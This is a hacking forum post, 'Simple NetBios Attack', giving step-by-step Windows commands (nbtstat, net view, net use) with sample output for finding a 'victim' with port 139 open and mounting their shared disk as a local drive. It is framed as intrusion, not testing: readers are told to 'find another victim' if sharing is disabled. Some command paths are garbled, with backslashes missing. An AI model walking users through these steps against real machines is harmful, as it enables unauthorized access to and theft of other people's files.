Jump to content
paxnWo

Simple NetBios Attack

Recommended Posts

Posted

Step 1

Get a IP (range) scanner.

Scan the victim's ip on TCP/IP port 139

Step 2

Open Command (CMD)

Do this by going to start/run

enter cmd and press ok

This is what you need to type down:

Replace 255.255.255.255 with the victims IP address.

c:windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------------------------

user<00> UNIQUE Registered

workgroup <00> GROUP Registered

user <03> UNIQUE Registered

user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx

---------------------------------------------------------------

If you don't get the number <20>.

The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down (change the 255.255.255.255):

c:windows>net view 255.255.255.255

if the output is like this:

Shared resources at 255.255.255.255

ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------

CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:

you can replace x: by anything letter yopu want but not your own drive letters.

CDISK is the name of the shared harddrive.

c:windows>net use x: 255.255.255.255CDISK

If the command is successful we will get the confirmation.

The command was completed successfullly

Now open windows explorer or just double click on the My Computer icon on your

desktop and you will see a new network drive X:> . Now your are a small time hacker.

Good luck.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...